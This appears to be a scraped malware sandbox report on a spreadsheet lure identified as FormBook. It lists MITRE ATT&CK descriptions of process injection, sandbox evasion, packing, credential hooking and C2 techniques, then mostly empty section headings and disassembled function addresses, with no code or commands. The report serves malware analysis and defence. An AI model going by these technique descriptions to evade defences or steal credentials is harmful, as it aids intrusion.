Instruction Fuzzy Hash: FA919D31D0022AEFDF24CF9AC8497EEB7B5FF45319F24806AD415A7651EB305A81CB92

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report (QUOTATION)B-RUS-20061REV2.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Function 00425448, Relevance: 3.8, Strings: 2, Instructions: 1330
COMMON

Function 00427018, Relevance: 3.8, Strings: 2, Instructions: 1320
COMMON

Function 00425891, Relevance: 3.8, Strings: 2, Instructions: 1315
COMMON

Function 00425508, Relevance: 2.6, Strings: 1, Instructions: 1333
COMMON

Function 004204E1, Relevance: 1.6, Strings: 1, Instructions: 301
COMMON

Function 00420098, Relevance: 1.5, Strings: 1, Instructions: 296
COMMON

Function 0042AE28, Relevance: 2.6, Strings: 2, Instructions: 58
COMMON

Function 00FADB48, Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Function 00FAD6C0, Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 00FAD870, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 00FAD548, Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 00FAD288, Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON